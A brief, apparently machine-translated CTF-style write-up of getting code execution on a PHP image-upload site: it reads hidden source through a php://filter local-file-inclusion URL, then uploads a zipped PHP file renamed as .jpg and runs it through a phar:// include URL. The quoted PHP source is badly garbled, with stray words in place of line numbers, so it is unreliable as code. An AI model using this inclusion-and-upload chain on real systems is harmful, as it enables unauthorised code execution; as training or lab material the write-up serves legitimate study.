Remember a simple Getshell case

Case Link:

http://202.112.51.184:8007/

Open the link and find that multiple pages are divided:

One click, it is probably clear that the file is uploaded in the specified format and then in the search to make the file execution thus Getshell, observe found after clicking on each page "? page=xxx" word, view source code discovery and hidden PHP files:

Then enter:

http://202.112.51.184:8004/index.php?page=php://filter/convert.base64-encode/ Resource=upload

Get a string of base64 codes:

After online decryption to get the Web page hidden source:

123<meta charset= "Utf-8" >4<?PHP5 $error=$_files[' Pic '] [' Error '];6 $tmpName=$_files[' Pic '] [' Tmp_name '];7 $name=$_files[' Pic '] [' Name '];8 $size=$_files[' Pic '] [' Size '];9 $type=mime_content_type ($tmpName);Ten Try{ One     if($name!=="") A     { -         $name 1=substr($name,-4); -         if(($name 1!== ". gif") and ($name 1!== ". jpg") and ($name 1!== '. Zip ')) the         { -             Echo"Hehe"; -             Echo"<script language=javascript>alert (' upload photos can only be jpg or gif! '); History.go ( -1) </script> "; -             Exit; +         } -         if($type!== "Image/jpeg" &&$type!== "Image/gif") +         { A             EchoMime_content_type ($tmpName); at             Echo"<script language=javascript>alert (' upload photos can only be jpg or gif! '); History.go ( -1) </script> "; -             Exit; -         } -         if(Is_uploaded_file($tmpName)){ -             $time= Time(); -             $rootpath= ' uploads/'.$time.$name 1; in             if(!Move_uploaded_file($tmpName,$rootpath)){ -             Echo"<script language= ' JavaScript ' >alert (' file move failed! '); window.location= ' index.php?page=submit ' </script> '; to             Exit; +         } -     } the     Echo"Picture ID:".$time; *     } $ }Panax Notoginseng Catch(Exception $e) - { the     Echo"ERROR"; + } A // the?> +
From the 14th line can be seen in fact also support zip file, think can start from here
Build a PHP file locally, which is intended to enable the site to parse the uploaded file after the execution of this code, that is, open the Phpinfo interface:
Phpinfo ();? >
After compressing it into a zip file, you can also change the format to a JPG upload to get the image ID:
Then remember the image ID and jump to the following page after the view page search:
At this time our PHP code has been executed, we can enter the following URL to get the Phpinfo page we need, that is, Getshell:
http://202.112.51.184:8007/INDEX.PHP?PAGE=PHAR://UPLOADS/1533638442.JPG/2
Remember a simple Getshell case